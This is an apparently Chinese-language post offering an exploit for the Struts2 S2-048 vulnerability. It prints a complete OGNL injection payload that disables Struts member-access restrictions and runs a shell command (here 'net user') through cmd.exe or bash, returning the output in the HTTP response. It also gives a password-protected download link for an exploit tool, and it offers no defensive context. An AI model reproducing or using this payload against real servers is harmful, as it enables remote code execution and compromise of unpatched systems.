Struts2-048(內附Exp & Poc)完美解決中文亂碼
POC:
%{(#secfree=multipart/form-data).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=net user).(#iswin=(@java.lang.System@getProperty(os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}
EXP(完美解決中文亂碼):
Linux下:
Windows下:
下載鏈接:鏈接:https://share.weiyun.com/81ba5930f258d5d4ce07cfb57b4f06a3 (密碼:J0MBlS)
推薦閱讀:
※WebLogic WLS-WebServices組件反序列化漏洞分析
※如何看待谷歌在微軟發布補丁之前公布並演示相關漏洞?
※一個幹掉所有「暴雪遊戲」的漏洞,暴雪玩家小心了!
※操作系統為什麼都有無數的漏洞?是故意留下的還是技術上無法達到完美?
※Apktool未正確解析XML導致的XXE漏洞分析